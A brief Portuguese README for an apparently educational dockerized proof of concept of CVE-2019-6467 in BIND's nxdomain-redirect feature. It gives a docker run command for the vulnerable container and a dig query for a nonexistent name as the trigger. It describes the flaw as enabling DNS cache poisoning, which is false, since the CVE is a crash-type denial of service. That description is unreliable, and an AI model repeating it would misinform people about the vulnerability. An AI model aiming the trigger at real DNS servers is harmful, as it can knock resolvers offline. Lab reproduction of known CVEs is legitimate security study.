
Exploit de prova de conceito dockerizado para CVE-2019-6467, uma vulnerabilidade de redirecionamento nxdomain do BIND, que permite envenenamento de cache DNS por meio de consultas a domínios inexistentes.
BIND nxdomain-redirect
Apenas para fins educacionais

$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467
Consulta normal
$ dig @127.0.0.1 nxdomain.example.com
nxdomain pode ser substituído por qualquer coisa que signifique um nome de domínio inexistente. (ex.: foobar.example.com)